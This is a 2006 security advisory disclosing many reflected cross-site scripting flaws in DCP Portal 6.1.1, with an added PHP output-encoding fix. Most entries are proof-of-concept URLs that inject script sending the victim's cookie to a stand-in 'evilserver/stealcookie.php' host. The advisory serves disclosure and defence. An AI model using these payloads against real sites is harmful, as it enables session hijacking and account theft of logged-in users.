DCP Portal: Multiple XSS Vulnerabilities
vulners.com, March 9, 2006 (SECURITYVULNS:DOC:11762)
===========================================================
DCP Portal: Multiple XSS Vulnerabilities

Technical University of Vienna Security Advisory
TUVSA-0603-001, March 9, 2006

Affected applications

DCP Portal (www.dcp-portal.com)

Versions 6.1.1 and prior.

Description

There are multiple cross-site scripting (XSS) vulnerabilities, which can be verified using the following
exploits (the user needs to be logged in). They are roughly sorted by entry point (i.e., the names of the
files that have to be navigated); the numbers given are line numbers within the affected file. The
vulnerabilities were discovered under the assumption that register_globals is on and magic_quotes_gpc is off.

index.php

calendar.php

  • 52:

http://localhost/dcp-portal611/calendar.php?subject_color="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 52:

http://localhost/dcp-portal611/calendar.php?images="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 55: like 52

  • 62:

http://localhost/dcp-portal611/calendar.php?day=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

http://localhost/dcp-portal611/calendar.php?year=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 92: analogous to lines 52 and 55 ($images)

  • 149: $_REQUEST['year'] again

  • 151: $_REQUEST['year'] again

  • between lines 199 and 219: $_REQUEST[*] again (nine times)

  • 223:
    echoing the value returned by function PrintCalendar (composes its
    return value from $_REQUEST[*])

  • 255: repeat

  • 230: $subject_color, like 52

  • 255: $_REQUEST['year']

  • 257: $_REQUEST['year']

  • 261: $_REQUEST['day']

forums.php

http://localhost/dcp-portal611/forums.php?action=board&bid="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 191:

http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1&replying_msg=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1&mid="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

inbox.php

lostpassword.php

  • 63:

http://localhost/dcp-portal611/lostpassword.php?subject_color="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 64:

http://localhost/dcp-portal611/lostpassword.php?email="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

mycontents.php

  • 88:

http://localhost/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 93:

http://localhost/dcp-portal611/mycontents.php?action=content&content_inicial=</textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 126:

http://localhost/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 155:

http://localhost/dcp-portal611/mycontents.php?action=addnews&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 159:

http://localhost/dcp-portal611/mycontents.php?action=addnews&content_inicial=</textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 185:

http://localhost/dcp-portal611/mycontents.php?action=addnews&mode=write&dcp_editor_contingut_html=xyz&c_name=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>&c_image_name=

  • 218:

http://localhost/dcp-portal611/mycontents.php?action=addanns&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 222: $content_inicial again

  • 248: $c_name again

  • 315:

http://localhost/dcp-portal611/mycontents.php?action=updatecontent&cid="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 320:

http://localhost/dcp-portal611/mycontents.php?action=updatecontent&cid=1&mode=write&c_image_name=xyz&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 326: $content_inicial again

  • 362: $c_name again

  • 404: $action_submit, via $cid (analogous to 315)

  • 414: $content_inicial again

  • 444: $c_name again

search.php

Solution

The authors have not responded to our messages, so there is no solution to these issues yet.
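Since no vendor fix was available, the following is an added example (not DCP Portal's own code) of how the echo sites listed above could be hardened in PHP: request values are read from explicit superglobals instead of register_globals, narrowly formatted parameters such as subject_color, day and year are validated, and everything else is HTML-encoded with ENT_QUOTES so that the `">` and `</textarea>` break-outs used in the advisory no longer leave their context. Function names and the shape of the "vulnerable" lines are assumptions inferred from the payloads, not the actual DCP Portal source.

```php
<?php
// Added example (not DCP Portal code): hardened output of request values
// for the three injection contexts shown in the advisory (double-quoted
// attribute, HTML body, <textarea> content). Names are hypothetical.
declare(strict_types=1);

// Read only from explicit superglobals; never rely on register_globals
// (it cannot be turned off at runtime, so do not depend on it at all).
function req(string $name, string $default = ''): string
{
    $v = $_REQUEST[$name] ?? $default;
    return is_string($v) ? $v : $default;
}

// Encode for HTML body, double-quoted attributes and <textarea> content.
// ENT_QUOTES encodes " and ', and < > are always encoded, so neither
// "><script> nor </textarea><script> can break out of its context.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow-list validation for parameters with a narrow format.
function colorOrDefault(string $s, string $default = '#ffffff'): string
{
    return preg_match('/^#[0-9a-fA-F]{6}$/', $s) === 1 ? $s : $default;
}

function intInRange(string $s, int $min, int $max, int $default): int
{
    if (!ctype_digit($s)) {
        return $default;
    }
    $n = (int) $s;
    return ($n >= $min && $n <= $max) ? $n : $default;
}

// Vulnerable shape (inferred from the subject_color="> payload):
//   echo '<td bgcolor="' . $subject_color . '">';
// Hardened: validate, then encode even the validated value.
$subjectColor = colorOrDefault(req('subject_color'));
echo '<td bgcolor="' . h($subjectColor) . '">';

// Vulnerable shape: $day / $year echoed straight into the page body.
// Hardened: integers cannot carry markup.
$year = intInRange(req('year'), 1970, 2100, (int) date('Y'));
$day  = intInRange(req('day'), 1, 31, (int) date('j'));
echo '<p>' . $year . '-' . $day . '</p>';

// Vulnerable shape: <textarea><?php echo $content_inicial ?></textarea>.
// Hardened: encoding turns </textarea> into harmless text.
echo '<textarea name="content_inicial">' . h(req('content_inicial')) . '</textarea>';
```

The same h() wrapper applies to the remaining sites ($c_name, $cid, $bid, $mid, $email, $images): the rule is to encode at the point of output, in the encoding of the surrounding context, rather than to filter on input.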

Timeline:

February 19, 2006:
Vulnerabilities indicated via andy at codeworx dot ca, but no response.

March 9, 2006:
Advisory submission.

References

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-001.txt

Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at